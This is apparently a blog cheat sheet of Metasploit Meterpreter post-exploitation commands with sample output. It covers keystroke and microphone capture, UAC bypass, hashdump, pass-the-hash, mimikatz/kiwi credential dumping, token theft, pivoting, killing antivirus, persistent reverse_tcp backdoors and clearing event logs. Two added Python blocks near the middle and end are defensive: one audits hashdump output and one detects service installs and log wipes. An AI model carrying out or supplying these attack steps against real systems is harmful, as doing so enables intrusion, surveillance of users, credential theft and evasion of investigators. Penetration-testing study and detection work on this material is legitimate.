MSF Post-Exploitation Summary
2022-06-30 16:31:00 [qq_51550750]
Files
1. File interaction commands
| ID | Command | Description |
|---|---|---|
| 1 | cat | Read file contents |
| 2 | cd | Change directory on the target |
| 3 | cp | Copy a file to a destination |
| 4 | mv | Move a file to a destination |
| 5 | chmod | Change file permissions (e.g. chmod 777 shell.elf) |
| 6 | del / rm | Delete a file on the target |
| 7 | dir | List the target directory |
| 8 | mkdir | Create a directory on the target |
| 9 | rmdir | Remove a directory on the target |
| 10 | edit | Edit a file |
| 11 | getlwd | Print the local working directory |
| 12 | getwd | Print the target working directory |
| 13 | lcd | Change the local directory |
| 14 | lls | List the local directory |
| 15 | ls | List files in the target directory |
| 16 | lpwd | Print the local working directory |
| 17 | pwd | Print the working directory |
| 19 | search | Search for files (see search -h for details) |
2. Uploading and downloading files
| Command | Description |
|---|---|
| upload | Upload a file to the target |
| download | Download a file from the target |
Capturing information from the target's devices
[1] Screen capture
The screen can be captured with the following command:
screenshot
Output:
meterpreter > screenshot
Screenshot saved to: /home/adian/ooTGibPg.jpeg
[2] Microphone capture
Command:
run sound_recorder
By default it records 30 seconds of audio; for a longer recording use the -l parameter.
meterpreter > run sound_recorder
[*] Saving recorded audio to /root/.msf4/logs/scripts/sound_recorder/WIN-ITNJLFM93P3_20210520.1422
[*] Recording a total of 0m 30s
Keystroke logging
Command:
run post/windows/capture/keylog_recorder
Output:
[*] Executing module against WIN-ITNJLFM93P3_1.wav
[*] Starting the keylog recorder...
[*] Keystrokes being saved in to /root/.msf4/loot/20210520231706_TestWin7_10.10.10.132_host.windows.key_377741.txt
[*] Recording keystrokes...
[*] User interrupt.
[*] Shutting down keylog recorder. Please wait...
Alternatively, start the capture with
keyscan_start
and, once keystrokes have been captured, use
keyscan_dump
to retrieve them.
To stop, use the following command:
keyscan_stop
Privilege escalation
Use the following command to check the current privilege level:
getuid
Here we are already running as SYSTEM:
Server username: NT AUTHORITY\SYSTEM
If we are not SYSTEM, we can try to escalate directly with the following command:
getsystem
On one occasion the escalation failed, so I tried bypassing UAC instead:
First,
bg
to background the session and keep it, then try the following two modules in turn:
use exploit/windows/local/bypassuac # This module creates several files on the target while it runs, so antivirus tends to flag it and its success rate is low.
use exploit/windows/local/bypassuac_injection # This module runs directly as a reflectively loaded DLL in memory and never touches the target's disk, which lowers the chance of antivirus detection.
When I tried these two modules, the first one failed but the second succeeded.
Harvesting usernames and passwords
Windows stores password hashes as LAN Manager (LM), NT LAN Manager (NTLM) or NT LAN Manager v2 (NTLMv2) hashes.
In msf, the hashdump command retrieves the password hashes of every user on the system:
hashdump
This command requires SYSTEM privileges.
Pass-the-hash login
We use the windows/smb/psexec module to pass the hash.
The hash we obtained is set as SMBUser and SMBPass. For example, given the hash
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMBUser is set to
Administrator
and SMBPass is set to
aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
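Seen from the defending side, the same hashdump output is a password-hygiene audit artifact. The following Python, added here and not part of the original post, parses the user:RID:LM:NT::: format shown above and flags blank passwords (the well-known empty-string LM and NT hashes), accounts still storing LM hashes, and accounts that share one password; apart from the quoted Administrator line, the sample records are constructed.

```python
"""Audit a hashdump listing for weak credential hygiene.
Added example, not part of the original post. It parses the record
format shown above (user:RID:LM_hash:NT_hash:::) and reports what a
defender reviewing such a dump should act on.
"""
from collections import defaultdict

# LM hash of the empty string: what appears when LM hashing is disabled
# (the default on modern Windows) or the password is blank.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty password (MD4 over the UTF-16LE empty string).
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample: line one is the record quoted above, the rest are made up.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacyapp:1002:0f20048efc645d0a0d7f0d2b3c1a1b2c:0123456789abcdef0123456789abcdef:::
"""

def parse_hashdump(text):
    """Parse user:RID:LM:NT::: lines into dicts; hashes are lower-cased."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError("malformed hashdump line: %r" % line)
        records.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return records

def audit(records):
    """Return (account, finding) pairs: blank passwords, LM hashes still
    being stored, and accounts that share one NT hash (one password)."""
    findings = []
    by_nt = defaultdict(list)
    for r in records:
        if r["nt"] == EMPTY_NT:
            findings.append((r["user"], "blank password"))
        if r["lm"] != EMPTY_LM:
            findings.append((r["user"], "LM hash stored"))
        by_nt[r["nt"]].append(r["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings.append((",".join(sorted(users)), "shared password"))
    return findings
```

hashdump output does not say whether an account is enabled, so a blank-password finding (Guest is disabled by default) still has to be checked against account status before it is treated as a live exposure.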
Recovering plaintext passwords
Under Meterpreter, use Mimikatz to retrieve passwords.
First load the Mimikatz extension:
load mimikatz
which produces the following output:
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
In msf6, mimikatz has been replaced by kiwi:
The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
The help text is as follows:
Kiwi Commands
=============
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_livessp Retrieve Live SSP creds
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)
kiwi is more comprehensive and keeps essentially all of mimikatz's functionality:
meterpreter > creds_msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
test WIN-ITNJLFM93P3 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0 da39a3ee5e6b4b0d3255bfef95601890afd80709
Impersonating tokens
steal_token
Token impersonation lets you act as another user on the network, for example to elevate privileges or create users and groups. When a user logs on to Windows, they are issued an access token as part of the authenticated session. An intruder who needs to perform an action as a domain administrator, for instance, would use token impersonation.
Use the ps command to list the running processes and the user each one runs as:
ps
The syntax for stealing a token is:
steal_token PID
From then on, commands execute under the stolen user's identity.
incognito
First load the extension:
load incognito
Run
list_tokens -u
to list all available tokens.
Impersonate one with the following command:
impersonate_token domain\\name
Note the double backslash.
Recovering deleted files from the target
Use the module
post/windows/gather/forensics/recovery_files
Set the DRIVE letter and the session id, then run it to recover files.
Using the Meterpreter shell as a pivot
Use the following command to list the current subnets:
run get_local_subnets
which gives:
meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 10.10.10.0/255.255.255.0
The message suggests using the autoroute post module to configure routes automatically:
meterpreter > run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module.
[*] Running module against WIN-ITNJLFM93P3
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.10.10.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 169.254.0.0/255.255.0.0 from Bluetooth
Routes can also be added manually. First background the shell:
background
then add the route by hand:
route add <subnet> <netmask> <session id>
Meterpreter scripts
Usage:
run <script path/name>
Process migration
Script:
post/windows/manage/migrate
Alternatively, use migrate directly to move into the process with the given PID:
migrate PID
Disabling antivirus
run killav
This still works in msf6 but prints a deprecation warning:
meterpreter > run killav
[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
In testing it did not detect Huorong antivirus, while the MS17-010 attack was blocked by Huorong.
Capturing all traffic on the target
Use packetrecorder to capture traffic, then analyse the capture in Wireshark:
meterpreter > run packetrecorder -i 1
[!] Meterpreter scripts are deprecated. Try post/windows/manage/rpcapd_start.
[!] Example: run post/windows/manage/rpcapd_start OPTION=value [...]
[*] Starting Packet capture on interface 1
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/WIN-ITNJLFM93P3_20210521.5655/WIN-ITNJLFM93P3_20210521.5655.cap
[*] Packet capture interval is 30 Seconds
Gathering system information
The scraper script enumerates all the information a user is likely to want:
meterpreter > run scraper
[*] New session on 10.10.10.132:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\Windows\TEMP\AoxTqVci.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\Windows\TEMP\xaFqszRg.reg)
[*] Cleaning HKLM
[*] Exporting HKCC
[*] Downloading HKCC (C:\Windows\TEMP\OqrObWNV.reg)
[*] Cleaning HKCC
[*] Exporting HKCR
[*] Downloading HKCR (C:\Windows\TEMP\rAJZLqAf.reg)
[*] Cleaning HKCR
[*] Exporting HKU
[*] Downloading HKU (C:\Windows\TEMP\esDrHZoB.reg)
[*] Cleaning HKU
[*] Completed processing on 10.10.10.132:445...
Creating a persistent backdoor
Use the persistence script and metsvc to create a persistent backdoor:
meterpreter > run persistence
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-ITNJLFM93P3_20210521.0320/WIN-ITNJLFM93P3_20210521.0320.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444
[*] Persistent agent script is 99668 bytes long
[+] Persistent Script written to C:\Windows\TEMP\ArDebnpVV.vbs
[*] Executing script C:\Windows\TEMP\ArDebnpVV.vbs
[+] Agent executed with PID 2524
Run
run persistence -h
to view the help and create a customised backdoor.
meterpreter > run metsvc
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Windows\TEMP\nzDwNmYr...
[*] >> Uploading metsrv.x86.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.
Start a multi/handler listener and the session will be established; make sure the handler's payload matches, otherwise the session will close.
Upgrading a command shell to Meterpreter
Simply run
sessions -u ID
Clearing tracks
Use irb directly:
meterpreter > irb
[*] Starting IRB shell...
>>
Once at the >> prompt, select the log to be cleared:
log = client.sys.eventlog.open('system')
log = client.sys.eventlog.open('security')
log = client.sys.eventlog.open('application')
log = client.sys.eventlog.open('directory service')
log = client.sys.eventlog.open('dns server')
log = client.sys.eventlog.open('file replication service')
and finally clear it:
log.clear
Or use clearev:
meterpreter > clearev
[*] Wiping 299 records from Application...
[*] Wiping 939 records from System...
[*] Wiping 230 records from Security...
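For the defender, both the metsvc service install above and clearev leave traces in the Windows event log. The following Python, an added example not from the original post, flags them in constructed JSON-lines records: Event ID 7045 for a service installed from a temp directory, and 104/1102 for cleared logs.

```python
"""Flag the event-log traces left by the two steps above: the metsvc
service install and clearev wiping the logs.
Added example, not from the original post. Input is constructed JSON
lines standing in for records exported from a log collector. Event IDs:
7045 (Service Control Manager: service installed; System log),
104 (Microsoft-Windows-Eventlog: a log file was cleared; System log),
1102 (Microsoft-Windows-Eventlog: audit log cleared; Security log).
"""
import json

# Constructed sample records (not real telemetry). The metsvc path mirrors the
# C:\Windows\TEMP\... install directory shown in the metsvc output above.
SAMPLE_EVENTS = r"""
{"Channel": "System", "EventID": 7036, "Provider": "Service Control Manager", "Message": "The Print Spooler service entered the running state."}
{"Channel": "System", "EventID": 7045, "Provider": "Service Control Manager", "ServiceName": "metsvc", "ImagePath": "C:\\Windows\\TEMP\\nzDwNmYr\\metsvc.exe", "AccountName": "LocalSystem"}
{"Channel": "System", "EventID": 7045, "Provider": "Service Control Manager", "ServiceName": "Spooler", "ImagePath": "C:\\Windows\\System32\\spoolsv.exe", "AccountName": "LocalSystem"}
{"Channel": "System", "EventID": 104, "Provider": "Microsoft-Windows-Eventlog", "Message": "The Application log file was cleared."}
{"Channel": "System", "EventID": 104, "Provider": "Microsoft-Windows-Eventlog", "Message": "The System log file was cleared."}
{"Channel": "Security", "EventID": 1102, "Provider": "Microsoft-Windows-Eventlog", "Message": "The audit log was cleared."}
"""

# Directories a legitimately installed service binary should not live in.
USER_WRITABLE_DIRS = ("\\windows\\temp\\", "\\users\\", "\\programdata\\")

def flag_event(ev):
    """Return an alert string for one parsed event, or None if benign."""
    eid, chan = ev.get("EventID"), ev.get("Channel")
    if chan == "Security" and eid == 1102:
        return "Security log cleared (1102)"
    if chan == "System" and eid == 104:
        return "event log cleared (104): " + ev.get("Message", "")
    if chan == "System" and eid == 7045:
        path = ev.get("ImagePath", "")
        if any(d in path.lower() for d in USER_WRITABLE_DIRS):
            return "service %s installed from %s" % (ev.get("ServiceName"), path)
    return None

def scan_events(jsonl):
    """Run flag_event over every JSON line and collect the alerts.
    The 104/1102 records land in the freshly cleared log itself, so they
    only survive a second wipe if the host forwards events to a collector:
    scan the forwarded copy, not the host's local log."""
    alerts = []
    for line in jsonl.splitlines():
        if line.strip():
            alert = flag_event(json.loads(line))
            if alert:
                alerts.append(alert)
    return alerts
```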